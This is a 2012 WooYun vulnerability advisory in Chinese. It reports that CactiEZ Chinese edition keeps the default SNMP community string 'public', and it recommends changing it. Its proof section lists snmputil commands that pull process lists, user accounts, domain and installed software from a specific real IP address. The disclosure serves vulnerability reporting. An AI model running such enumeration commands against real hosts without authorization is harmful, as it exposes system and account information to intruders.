snmp使用默认团体名_CactiEZ 中文版snmp默认团体名

漏洞概要

缺陷编号：WooYun-2012-07862

漏洞标题：CactiEZ 中文版snmp默认团体名

相关厂商：CactiEZ 中文版

漏洞作者：南国利剑

提交时间：2012-06-05 12:50

公开时间：2012-06-05 12:50

漏洞类型：重要敏感信息泄露

危害等级：低

自评Rank：2

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签：

漏洞详情

披露状态：

2012-06-05: 积极联系厂商并且等待厂商认领中，细节不对外公开

2012-06-05: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

CactiEZ 中文版，是一款监控控制系统；其中默认的snmp设置public，没有修改会导致可以远程读取目标设备主机信息。

详细说明：

CactiEZ 中文版，是一款监控控制系统；其中默认的snmp设置public，没有修改导致可以远程读取目标设备主机信息。

漏洞证明：

snmputil.exe walk 120.86.64.156 public .1.3.6.1.2.1.25.4.2.1.2 //**进程列表snmputil.exe walk 120.86.64.156 public .1.3.6.1.4.77.1.2.25.1.1 //**用户列表snmputil.exe get 120.86.64.156 public .1.3.6.1.4.77.1.4.1.0 //**域名snmputil.exe walk 120.86.64.156 public .1.3.6.1.2.1.25.6.3.1.2 //**安装的软件snmputil.exe walk 120.86.64.156 public .1.3.6.1.2.1.1 //**系统信息

修复方案：

修改SNMP默认团体名。

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

评价

2010-01-01 00:00 小贱人 白帽子 | Rank:4 漏洞数:3)

mark